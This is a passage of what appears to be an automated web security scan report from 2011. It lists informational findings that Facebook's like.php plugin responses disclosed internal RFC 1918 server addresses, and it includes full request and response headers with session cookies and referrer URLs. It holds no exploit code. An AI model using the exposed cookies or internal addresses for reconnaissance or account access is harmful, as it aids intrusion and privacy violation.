<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.108. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com/bookingcom&layout=standard&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_hp HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.49
X-Cnection: close
Date: Mon, 03 Oct 2011 01:31:09 GMT
Content-Length: 25938

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.109. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com/bookingcom&layout=button_count&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.114.43
X-Cnection: close
Date: Mon, 03 Oct 2011 01:02:09 GMT
Content-Length: 23606

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.110. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?app_id=178412055558267&href=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&send=false&layout=button_count&width=140&show_faces=false&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.23
X-Cnection: close
Date: Sun, 02 Oct 2011 23:57:56 GMT
Content-Length: 23424

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.111. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31af502d4%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff30dabeee4%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.20.67
X-Cnection: close
Date: Mon, 03 Oct 2011 00:35:02 GMT
Content-Length: 25824

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.112. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9121af5%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff17fcfa228%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.69.123
X-Cnection: close
Date: Mon, 03 Oct 2011 00:38:24 GMT
Content-Length: 26049

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.113. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20cac3de8%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff7abffe4c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.44
X-Cnection: close
Date: Mon, 03 Oct 2011 00:58:06 GMT
Content-Length: 25825

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.114. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.193.30
X-Cnection: close
Date: Mon, 03 Oct 2011 00:11:18 GMT
Content-Length: 23325

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.115. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.96.57
X-Cnection: close
Date: Mon, 03 Oct 2011 01:02:25 GMT
Content-Length: 23565

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.116. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.ORBITZ.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.84.111
X-Cnection: close
Date: Mon, 03 Oct 2011 00:40:33 GMT
Content-Length: 23322

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.117. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run&send=false&locale=en_EN&layout=box_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.105.31
X-Cnection: close
Date: Sun, 02 Oct 2011 23:59:50 GMT
Content-Length: 23424

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.118. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run&send=false&locale=en_EN&layout=button_count&width=120&show_faces=true&action=like&colorscheme=light&font&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.123.35
X-Cnection: close
Date: Sun, 02 Oct 2011 23:58:55 GMT
Content-Length: 23465

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.119. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.booking.com%2Fhotel%2Fus%2Fcopley-square.html&layout=standard&show_faces=false&font=arial&action=like&colorscheme=light&locale=en_US&ref=socnet_fb_og_h HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.146.61
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:26 GMT
Content-Length: 26223

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.120. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhotelplanner&layout=button_count&show_faces=false&width=46&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.129.50
X-Cnection: close
Date: Mon, 03 Oct 2011 00:13:32 GMT
Content-Length: 23478

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.121. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?api_key=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e09c0798%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff2ef68ea8c%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&font=arial&href=http%3A%2F%2Fwww.expedia.com%2FBoston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information%3Folacid%3Dhotel.brand.facebook.like&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Boston-Hotels-Hotel-Commonwealth.h894999.Hotel-Information?icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&chkin=10/14/11&hashTag=roomsAndRates&chkout=10/16/11&eapid=21187-1&rm1=a2&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS; lsd=xyVNA

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.72.54
X-Cnection: close
Date: Mon, 03 Oct 2011 01:07:09 GMT
Content-Length: 31434

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like</title><style>body{background:#fff;font-size: 11px;font-famil
...[SNIP]...
23.122. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df341a7f6b8%26origin%3Dhttp%253A%252F%252Fwww.orbitz.com%252Ff3aab797f%26relation%3Dparent.parent%26transport%3Dpostmessage&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2FOrbitz&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.56
X-Cnection: close
Date: Mon, 03 Oct 2011 00:27:24 GMT
Content-Length: 26184

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
